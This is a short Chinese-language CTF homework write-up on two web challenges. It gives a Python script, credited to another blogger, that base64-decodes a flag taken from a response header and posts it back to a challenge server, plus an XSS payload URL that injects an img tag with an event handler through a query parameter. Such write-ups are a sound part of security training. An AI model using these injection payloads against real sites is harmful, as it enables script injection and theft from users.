每日作业
Web6
查看源码
用burpsuit抓包,发现一串特殊的字符,
PHPSESSID=e52n99cc62ovgnb8gdh9sk8m3olcjtbm
和flag 但感觉这出来的太直接来了
flag:6LeR55qE6L+Y5LiN6ZSZ77yM57uZ5L2gZmxhZ+WQpzogT1RjeE16QTU=
Base64解码,但这个key不对
得重新想思路
观察就会发现,每次访问的时候cookie是会变化的用python脚本
#coding:utf-8
import requests,base64
import re
url='http://120.24.86.145:8002/web6/'
value=[0]*1000000
s=requests.Session()
content = s.post(url)
html = content.headers['flag']
flag = base64.b64decode(base64.b64decode(html)[-8:])
#print flag
data = {'margin':flag}
content = s.post(url,data=data)
printcontent.text
脚本来自Assassin__is__me的博客
Xss
来自http://blog.****.net/bcbobo21cn/article/details/51803435
前台请求一个接口,接口返回一些 HTML 标签拼接成的字符串,以供前端直接 innerHTML 生成 DOM 元素,这样的做法非常普遍。但是你是否遇到过,如果字符串中拼接的 HTML 标签中有 script 标签,那么该段脚本是无法执行的,这并不是 bug,而是 w3c 的文档规定的。来自http://www.cnblogs.com/zichi/p/run-innerHTML-script.html
http://103.238.227.13:10089/?id=xxxx
http://103.238.227.13:10089/?id=\u003cimg%20src=1%20onload=alert(_key_)\u003e